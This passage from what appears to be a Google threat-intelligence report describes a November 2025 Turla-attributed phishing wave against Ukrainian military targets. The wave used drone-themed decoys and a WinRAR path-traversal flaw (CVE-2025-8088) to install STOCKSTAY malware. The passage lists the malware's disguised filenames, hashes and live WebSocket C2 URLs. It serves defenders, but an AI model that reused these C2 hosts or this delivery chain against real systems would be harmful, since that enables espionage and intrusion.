&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 20: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;November 2025: Ukraine — Drone-Related Lures and Deployment via CVE-2025-8088&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On November 6, 2025, GTIG identified a batch of phishing emails being sent from a drone-themed UKR.NET email account, to approximately 20 Ukraine-based targets, each containing a unique ukr.net file sharing link. Each link led to a malicious RAR archive which exploits a path traversal vulnerability in WinRAR (&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2025-8088&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) to install the core STOCKSTAY components. Continuations of this phishing activity were observed on November 12 and 14, 2025. We identified that only around 30% of the recipients of these phishing emails opened the emails, however we are unable to confirm how many of these individuals downloaded or executed the malicious payloads. All affected Google accounts were marked for additional authentication checks as a precautionary measure against potential account compromise. Google also notified affected users via our &lt;/span&gt;&lt;a href="https://support.google.com/mail/answer/2591015" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Government Backed Attack Warning&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (GBAW) notifications.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified two distinct types of Ukrainian-language decoy documents within the malicious RAR archives, both appearing to target Ukrainian military personnel. The first, “Донесення БпЛА 06.11.2025.docx” (“UAV report 06.11.2025.docx”), claimed to be “[A] Report on the availability/need for UAVs, their condition, the availability of crews for each UAV in the units, their training in the defense zone of the 1st Brigade as of 06.11.2025” (see Figure 10).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="“Report” Decoy document from November 2025" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig10.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 10: “Report” Decoy document from November 2025&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The second decoy, observed as “Товари(докладніше).docx” (“Products (more details).docx”) and “Приклади товарів для листа (деталізовано).docx” (“Examples of products for the letter (detailed).docx”), predominantly comprised of an equipment list referencing: “Tactical medicine”; “Communication and surveillance equipment”; “Equipment and survival equipment”; and “Automotive property” (see Figure 11).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="“Equipment List” Decoy document from November 2025" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig11.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 11: “Equipment List” Decoy document from November 2025&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each of the decoy documents contained an external image reference that causes a connection to be made from the victim’s machine to a site likely monitored by the threat actor, signaling that the document has been opened. GTIG believes the URLs referenced by the decoy documents may be hosted on compromised infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified that the instances of STOCKSTAY observed being deployed during this operation contained enhancements intended to increase resistance to detection, specifically by carving out functionality into external modules. These external modules were named to imitate legitimate Windows libraries, using the filenames shown in Table 20.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Component&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Shared STOCKSTAY core module&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-lib-math-core.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSDriver.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER core module&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-wmcpdt.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSRender.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER core module&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-win-render.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 21: STOCKSTAY component filenames observed in November 2025&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG observed two distinct STOCKSTAY WebSocket C2 URLs being used during this phishing wave. The majority of instances used the URL &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://driverx86-adobe.onrender.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;; however, we were able to identify at least one instance of STOCKSTAY using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://google-ai-labs-it.onrender.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, corresponding to the previously described GitHub repository associated with the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ChikenFresh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; user.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alongside the core STOCKSTAY components, the malicious RAR archives contained LNK files, described as “Updater Shortcut”, corresponding to each core STOCKSTAY component. The extraction file path was configured to attempt to deploy into the startup programs directory. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG was able to identify that the actor began creating the LNK files for this operation approximately six hours prior to the first phishing emails being sent, with the Ukrainian-language lure documents being created around four hours prior.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;a40bf9c75d1bfa6d66f1179f2321de6589f80d3089d992797a9cb0e84f6196ce&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e316b1e13154dc6115e1e0c023f6fe3d17861cae839d4a4a81779b6aad9a24f8&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSDriver.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;c905cb512018cc55512c6a22677c3d6f389c47afd54d7c85797868fc4fcb90e9&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSRender.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;667a8f568a611f2f3d84a366b7946b360e055bece9699c95aad619637ab72a38&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-lib-math-core.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Module containing core crypt and obfuscation routines, historically found within core STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b287347a5bff8af360ce0e6500c336b6fe6d97920abc26202c9d843ffebc5f89&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-win-render.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Module containing backdoor command handlers, historically found within STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;1682e8d82016b3f10434d2ebac995fd3b6aa812f079bfd7888652e94a994d851&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ms-api-wmcpdt.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Module containing STOCKSTAY’s IPC logic, historically found within each STOCKSTAY component&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e2a0f4440f67998a0215d49be31746ea192bfcb4dc4ee532a218f8cf13605714&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSViewer.lnk&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LNK shortcut intended to execute STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;3627f582420ad2782d452fe6d13fae42658d1484296351d3916703e25dcadd14&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSRender.lnk&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LNK shortcut intended to execute STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;77417df21b4b4e8d86b8bda4afeef93fd36f355362586b2d1f51121a82244167&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MSDriver.lnk&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;LNK shortcut intended to execute STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;813c78b5b6ef28a9c0ed35f2c6cd88fc50880ab91f8777dfe7aaccb1c24b08d5&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e83f274bf9914c6cfc0c6b3cdadf089565f49dace4aca93287c22aba9641c8f3&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;f964353b9ae4bedbe62de6c0d7eafa9fb8b87897bbaea483aedaa8ae191834da&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;Table 22: File indicators&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://driverx86-adobe.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://google-ai-labs-it.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 23: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Attribution&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG attributes the STOCKSTAY ecosystem and related activity to threat clusters assessed with high confidence links to Turla, based on the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY uses Windows-1251 during command-processing - an encoding notably designed specifically to support Cyrillic script. This is indicative of a development or operational environment linked to Eastern Europe, the Balkans, or Central Asia. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY has code overlaps with KAZUAR, a widely-attributed proprietary Turla toolkit, based on the recent introduction of K1MORPHER string obfuscation into both malware families within a similar time window.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG observed STOCKSTAY being delivered from compromised infrastructure which was also identified as hosting part of Turla’s victim-facing KAZUAR C2 infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Turla has a consistent focus on targeting Ukrainian Defense and Military organizations, and was identified within a Mandiant Incident Response deploying STOCKSTAY alongside a range of other proprietary Turla malware, such as WILDDAY, DIAMONDBACK, and KAZUAR.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Detections&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Google Security Operations (SecOps)&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats, Mandiant Hunting and Mandiant Intel Emerging Threats rule packs:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Archiver Extraction To Windows Startup&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Registry Write Registry Run Keys&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Registry Write to Run Registry Key&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Potential RDP File Write From Phishing&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RDP Connection Initiated from Staging Directory&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Onrender Subdomain Suspicious DNS Query&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;YARA Rules&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
